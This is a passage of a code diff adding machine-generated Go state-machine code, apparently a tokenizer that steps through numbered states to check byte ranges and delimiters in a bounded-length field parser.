st_case_65: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st66 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st66 + } + case data[(p)] >= 35: + goto st66 + } + goto st0 + st66: + if (p)++; (p) == (pe) { + goto _test_eof66 + } + st_case_66: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st67 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st67 + } + case data[(p)] >= 35: + goto st67 + } + goto st0 + st67: + if (p)++; (p) == (pe) { + goto _test_eof67 + } + st_case_67: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st68 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && 
data[(p)] <= 126 { + goto st68 + } + case data[(p)] >= 35: + goto st68 + } + goto st0 + st68: + if (p)++; (p) == (pe) { + goto _test_eof68 + } + st_case_68: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st69 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st69 + } + case data[(p)] >= 35: + goto st69 + } + goto st0 + st69: + if (p)++; (p) == (pe) { + goto _test_eof69 + } + st_case_69: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st70 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st70 + } + case data[(p)] >= 35: + goto st70 + } + goto st0 + st70: + if (p)++; (p) == (pe) { + goto _test_eof70 + } + st_case_70: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st71 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st71 + } + case data[(p)] >= 35: + goto st71 + } + goto st0 + st71: + if (p)++; (p) == (pe) { + goto _test_eof71 + } + st_case_71: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st72 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st72 + } + case data[(p)] >= 35: + goto st72 + } + goto st0 + st72: + if (p)++; (p) == (pe) { + goto _test_eof72 + } + st_case_72: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st73 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st73 + } + case data[(p)] >= 35: + goto st73 + } + goto st0 + st73: + if (p)++; (p) == (pe) { + goto _test_eof73 + } + st_case_73: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st74 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st74 + } + case data[(p)] >= 35: + goto st74 + } + goto st0 + st74: + if (p)++; (p) == (pe) { + goto _test_eof74 + } + 
st_case_74: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st75 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st75 + } + case data[(p)] >= 35: + goto st75 + } + goto st0 + st75: + if (p)++; (p) == (pe) { + goto _test_eof75 + } + st_case_75: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st76 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st76 + } + case data[(p)] >= 35: + goto st76 + } + goto st0 + st76: + if (p)++; (p) == (pe) { + goto _test_eof76 + } + st_case_76: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st77 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st77 + } + case data[(p)] >= 35: + goto st77 + } + goto st0 + st77: + if (p)++; (p) == (pe) { + goto _test_eof77 + } + st_case_77: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st78 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st78 + } + case data[(p)] >= 35: + goto st78 + } + goto st0 + st78: + if (p)++; (p) == (pe) { + goto _test_eof78 + } + st_case_78: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st79 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st79 + } + case data[(p)] >= 35: + goto st79 + } + goto st0 + st79: + if (p)++; (p) == (pe) { + goto _test_eof79 + } + st_case_79: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st80 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st80 + } + case data[(p)] >= 35: + goto st80 + } + goto st0 + st80: + if (p)++; (p) == (pe) { + goto _test_eof80 + } + st_case_80: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st81 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 
62 <= data[(p)] && data[(p)] <= 126 { + goto st81 + } + case data[(p)] >= 35: + goto st81 + } + goto st0 + st81: + if (p)++; (p) == (pe) { + goto _test_eof81 + } + st_case_81: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st82 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st82 + } + case data[(p)] >= 35: + goto st82 + } + goto st0 + st82: + if (p)++; (p) == (pe) { + goto _test_eof82 + } + st_case_82: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st83 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st83 + } + case data[(p)] >= 35: + goto st83 + } + goto st0 + st83: + if (p)++; (p) == (pe) { + goto _test_eof83 + } + st_case_83: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st84 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st84 + } + case data[(p)] >= 35: + goto st84 + } + goto st0 + st84: + if (p)++; (p) == (pe) { + goto _test_eof84 + } + st_case_84: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st85 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st85 + } + case data[(p)] >= 35: + goto st85 + } + goto st0 + st85: + if (p)++; (p) == (pe) { + goto _test_eof85 + } + st_case_85: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st86 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st86 + } + case data[(p)] >= 35: + goto st86 + } + goto st0 + st86: + if (p)++; (p) == (pe) { + goto _test_eof86 + } + st_case_86: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st87 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st87 + } + case data[(p)] >= 35: + goto st87 + } + goto st0 + st87: + if (p)++; (p) == (pe) { + goto 
_test_eof87 + } + st_case_87: + switch data[(p)] { + case 32: + goto tr27 + case 93: + goto tr29 + } + goto st0 + st88: + if (p)++; (p) == (pe) { + goto _test_eof88 + } + st_case_88: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st89 + } + goto st0 + st89: + if (p)++; (p) == (pe) { + goto _test_eof89 + } + st_case_89: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st90 + } + goto st0 + st90: + if (p)++; (p) == (pe) { + goto _test_eof90 + } + st_case_90: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st91 + } + goto st0 + st91: + if (p)++; (p) == (pe) { + goto _test_eof91 + } + st_case_91: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st92 + } + goto st0 + st92: + if (p)++; (p) == (pe) { + goto _test_eof92 + } + st_case_92: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st93 + } + goto st0 + st93: + if (p)++; (p) == (pe) { + goto _test_eof93 + } + st_case_93: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st94 + } + goto st0 + st94: + if (p)++; (p) == (pe) { + goto _test_eof94 + } + st_case_94: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st95 + } + goto st0 + st95: + if (p)++; (p) == (pe) { + goto _test_eof95 + } + st_case_95: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st96 + } + goto st0 + st96: + if (p)++; (p) == (pe) { + goto _test_eof96 + } + st_case_96: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st97 + } + goto st0 + st97: + if (p)++; (p) == (pe) { + goto _test_eof97 + } + st_case_97: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st98 + } + goto st0 + st98: + if (p)++; (p) == (pe) { + goto _test_eof98 + } + st_case_98: + if data[(p)] 
== 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st99 + } + goto st0 + st99: + if (p)++; (p) == (pe) { + goto _test_eof99 + } + st_case_99: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st100 + } + goto st0 + st100: + if (p)++; (p) == (pe) { + goto _test_eof100 + } + st_case_100: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st101 + } + goto st0 + st101: + if (p)++; (p) == (pe) { + goto _test_eof101 + } + st_case_101: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st102 + } + goto st0 + st102: + if (p)++; (p) == (pe) { + goto _test_eof102 + } + st_case_102: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st103 + } + goto st0 + st103: + if (p)++; (p) == (pe) { + goto _test_eof103 + } + st_case_103: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st104 + } + goto st0 + st104: + if (p)++; (p) == (pe) { + goto _test_eof104 + } + st_case_104: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st105 + } + goto st0 + st105: + if (p)++; (p) == (pe) { + goto _test_eof105 + } + st_case_105: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st106 + } + goto st0 + st106: + if (p)++; (p) == (pe) { + goto _test_eof106 + } + st_case_106: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st107 + } + goto st0 + st107: + if (p)++; (p) == (pe) { + goto _test_eof107 + } + st_case_107: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st108 + } + goto st0 + st108: + if (p)++; (p) == (pe) { + goto _test_eof108 + } + st_case_108: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st109 + } + goto st0 + st109: + if (p)++; (p) == (pe) { + goto _test_eof109 + } + 
st_case_109: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st110 + } + goto st0 + st110: + if (p)++; (p) == (pe) { + goto _test_eof110 + } + st_case_110: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st111 + } + goto st0 + st111: + if (p)++; (p) == (pe) { + goto _test_eof111 + } + st_case_111: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st112 + } + goto st0 + st112: + if (p)++; (p) == (pe) { + goto _test_eof112 + } + st_case_112: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st113 + } + goto st0 + st113: + if (p)++; (p) == (pe) { + goto _test_eof113 + } + st_case_113: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st114 + } + goto st0 + st114: + if (p)++; (p) == (pe) { + goto _test_eof114 + } + st_case_114: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st115 + } + goto st0 + st115: + if (p)++; (p) == (pe) { + goto _test_eof115 + } + st_case_115: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st116 + } + goto st0 + st116: + if (p)++; (p) == (pe) { + goto _test_eof116 + } + st_case_116: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st117 + } + goto st0 + st117: + if (p)++; (p) == (pe) { + goto _test_eof117 + } + st_case_117: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st118 + } + goto st0 + st118: + if (p)++; (p) == (pe) { + goto _test_eof118 + } + st_case_118: + if data[(p)] == 32 { + goto tr22 + } + goto st0 + st119: + if (p)++; (p) == (pe) { + goto _test_eof119 + } + st_case_119: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st120 + } + goto st0 + st120: + if (p)++; (p) == (pe) { + goto _test_eof120 + } + st_case_120: + if data[(p)] == 32 { 
+ goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st121 + } + goto st0 + st121: + if (p)++; (p) == (pe) { + goto _test_eof121 + } + st_case_121: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st122 + } + goto st0 + st122: + if (p)++; (p) == (pe) { + goto _test_eof122 + } + st_case_122: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st123 + } + goto st0 + st123: + if (p)++; (p) == (pe) { + goto _test_eof123 + } + st_case_123: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st124 + } + goto st0 + st124: + if (p)++; (p) == (pe) { + goto _test_eof124 + } + st_case_124: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st125 + } + goto st0 + st125: + if (p)++; (p) == (pe) { + goto _test_eof125 + } + st_case_125: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st126 + } + goto st0 + st126: + if (p)++; (p) == (pe) { + goto _test_eof126 + } + st_case_126: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st127 + } + goto st0 + st127: + if (p)++; (p) == (pe) { + goto _test_eof127 + } + st_case_127: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st128 + } + goto st0 + st128: + if (p)++; (p) == (pe) { + goto _test_eof128 + } + st_case_128: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st129 + } + goto st0 + st129: + if (p)++; (p) == (pe) { + goto _test_eof129 + } + st_case_129: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st130 + } + goto st0 + st130: + if (p)++; (p) == (pe) { + goto _test_eof130 + } + st_case_130: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st131 + } + goto st0 + st131: + if (p)++; (p) == (pe) { + goto _test_eof131 + } + 
st_case_131: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st132 + } + goto st0 + st132: + if (p)++; (p) == (pe) { + goto _test_eof132 + } + st_case_132: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st133 + } + goto st0 + st133: + if (p)++; (p) == (pe) { + goto _test_eof133 + } + st_case_133: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st134 + } + goto st0 + st134: + if (p)++; (p) == (pe) { + goto _test_eof134 + } + st_case_134: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st135 + } + goto st0 + st135: + if (p)++; (p) == (pe) { + goto _test_eof135 + } + st_case_135: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st136 + } + goto st0 + st136: + if (p)++; (p) == (pe) { + goto _test_eof136 + } + st_case_136: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st137 + } + goto st0 + st137: + if (p)++; (p) == (pe) { + goto _test_eof137 + } + st_case_137: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st138 + } + goto st0 + st138: + if (p)++; (p) == (pe) { + goto _test_eof138 + } + st_case_138: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st139 + } + goto st0 + st139: + if (p)++; (p) == (pe) { + goto _test_eof139 + } + st_case_139: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st140 + } + goto st0 + st140: + if (p)++; (p) == (pe) { + goto _test_eof140 + } + st_case_140: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st141 + } + goto st0 + st141: + if (p)++; (p) == (pe) { + goto _test_eof141 + } + st_case_141: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st142 + } + goto st0 + st142: + if (p)++; (p) == (pe) { + 
goto _test_eof142 + } + st_case_142: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st143 + } + goto st0 + st143: + if (p)++; (p) == (pe) { + goto _test_eof143 + } + st_case_143: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st144 + } + goto st0 + st144: + if (p)++; (p) == (pe) { + goto _test_eof144 + } + st_case_144: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st145 + } + goto st0 + st145: + if (p)++; (p) == (pe) { + goto _test_eof145 + } + st_case_145: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st146 + } + goto st0 + st146: + if (p)++; (p) == (pe) { + goto _test_eof146 + } + st_case_146: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st147 + } + goto st0 + st147: + if (p)++; (p) == (pe) { + goto _test_eof147 + } + st_case_147: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st148 + } + goto st0 + st148: + if (p)++; (p) == (pe) { + goto _test_eof148 + } + st_case_148: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st149 + } + goto st0 + st149: + if (p)++; (p) == (pe) { + goto _test_eof149 + } + st_case_149: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st150 + } + goto st0 + st150: + if (p)++; (p) == (pe) { + goto _test_eof150 + } + st_case_150: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st151 + } + goto st0 + st151: + if (p)++; (p) == (pe) { + goto _test_eof151 + } + st_case_151: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st152 + } + goto st0 + st152: + if (p)++; (p) == (pe) { + goto _test_eof152 + } + st_case_152: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st153 + } + goto st0 + st153: + 
if (p)++; (p) == (pe) { + goto _test_eof153 + } + st_case_153: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st154 + } + goto st0 + st154: + if (p)++; (p) == (pe) { + goto _test_eof154 + } + st_case_154: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st155 + } + goto st0 + st155: + if (p)++; (p) == (pe) { + goto _test_eof155 + } + st_case_155: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st156 + } + goto st0 + st156: + if (p)++; (p) == (pe) { + goto _test_eof156 + } + st_case_156: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st157 + } + goto st0 + st157: + if (p)++; (p) == (pe) { + goto _test_eof157 + } + st_case_157: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st158 + } + goto st0 + st158: + if (p)++; (p) == (pe) { + goto _test_eof158 + } + st_case_158: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st159 + } + goto st0 + st159: + if (p)++; (p) == (pe) { + goto _test_eof159 + } + st_case_159: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st160 + } + goto st0 + st160: + if (p)++; (p) == (pe) { + goto _test_eof160 + } + st_case_160: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st161 + } + goto st0 + st161: + if (p)++; (p) == (pe) { + goto _test_eof161 + } + st_case_161: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st162 + } + goto st0 + st162: + if (p)++; (p) == (pe) { + goto _test_eof162 + } + st_case_162: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st163 + } + goto st0 + st163: + if (p)++; (p) == (pe) { + goto _test_eof163 + } + st_case_163: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st164 + 
} + goto st0 + st164: + if (p)++; (p) == (pe) { + goto _test_eof164 + } + st_case_164: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st165 + } + goto st0 + st165: + if (p)++; (p) == (pe) { + goto _test_eof165 + } + st_case_165: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st166 + } + goto st0 + st166: + if (p)++; (p) == (pe) { + goto _test_eof166 + } + st_case_166: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st167 + } + goto st0 + st167: + if (p)++; (p) == (pe) { + goto _test_eof167 + } + st_case_167: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st168 + } + goto st0 + st168: + if (p)++; (p) == (pe) { + goto _test_eof168 + } + st_case_168: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st169 + } + goto st0 + st169: + if (p)++; (p) == (pe) { + goto _test_eof169 + } + st_case_169: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st170 + } + goto st0 + st170: + if (p)++; (p) == (pe) { + goto _test_eof170 + } + st_case_170: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st171 + } + goto st0 + st171: + if (p)++; (p) == (pe) { + goto _test_eof171 + } + st_case_171: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st172 + } + goto st0 + st172: + if (p)++; (p) == (pe) { + goto _test_eof172 + } + st_case_172: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st173 + } + goto st0 + st173: + if (p)++; (p) == (pe) { + goto _test_eof173 + } + st_case_173: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st174 + } + goto st0 + st174: + if (p)++; (p) == (pe) { + goto _test_eof174 + } + st_case_174: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] 
<= 126 { + goto st175 + } + goto st0 + st175: + if (p)++; (p) == (pe) { + goto _test_eof175 + } + st_case_175: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st176 + } + goto st0 + st176: + if (p)++; (p) == (pe) { + goto _test_eof176 + } + st_case_176: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st177 + } + goto st0 + st177: + if (p)++; (p) == (pe) { + goto _test_eof177 + } + st_case_177: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st178 + } + goto st0 + st178: + if (p)++; (p) == (pe) { + goto _test_eof178 + } + st_case_178: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st179 + } + goto st0 + st179: + if (p)++; (p) == (pe) { + goto _test_eof179 + } + st_case_179: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st180 + } + goto st0 + st180: + if (p)++; (p) == (pe) { + goto _test_eof180 + } + st_case_180: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st181 + } + goto st0 + st181: + if (p)++; (p) == (pe) { + goto _test_eof181 + } + st_case_181: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st182 + } + goto st0 + st182: + if (p)++; (p) == (pe) { + goto _test_eof182 + } + st_case_182: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st183 + } + goto st0 + st183: + if (p)++; (p) == (pe) { + goto _test_eof183 + } + st_case_183: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st184 + } + goto st0 + st184: + if (p)++; (p) == (pe) { + goto _test_eof184 + } + st_case_184: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st185 + } + goto st0 + st185: + if (p)++; (p) == (pe) { + goto _test_eof185 + } + st_case_185: + if data[(p)] == 32 { + goto tr19 + } + if 33 
<= data[(p)] && data[(p)] <= 126 { + goto st186 + } + goto st0 + st186: + if (p)++; (p) == (pe) { + goto _test_eof186 + } + st_case_186: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st187 + } + goto st0 + st187: + if (p)++; (p) == (pe) { + goto _test_eof187 + } + st_case_187: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st188 + } + goto st0 + st188: + if (p)++; (p) == (pe) { + goto _test_eof188 + } + st_case_188: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st189 + } + goto st0 + st189: + if (p)++; (p) == (pe) { + goto _test_eof189 + } + st_case_189: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st190 + } + goto st0 + st190: + if (p)++; (p) == (pe) { + goto _test_eof190 + } + st_case_190: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st191 + } + goto st0 + st191: + if (p)++; (p) == (pe) { + goto _test_eof191 + } + st_case_191: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st192 + } + goto st0 + st192: + if (p)++; (p) == (pe) { + goto _test_eof192 + } + st_case_192: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st193 + } + goto st0 + st193: + if (p)++; (p) == (pe) { + goto _test_eof193 + } + st_case_193: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st194 + } + goto st0 + st194: + if (p)++; (p) == (pe) { + goto _test_eof194 + } + st_case_194: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st195 + } + goto st0 + st195: + if (p)++; (p) == (pe) { + goto _test_eof195 + } + st_case_195: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st196 + } + goto st0 + st196: + if (p)++; (p) == (pe) { + goto _test_eof196 + } + st_case_196: + if data[(p)] == 32 { 
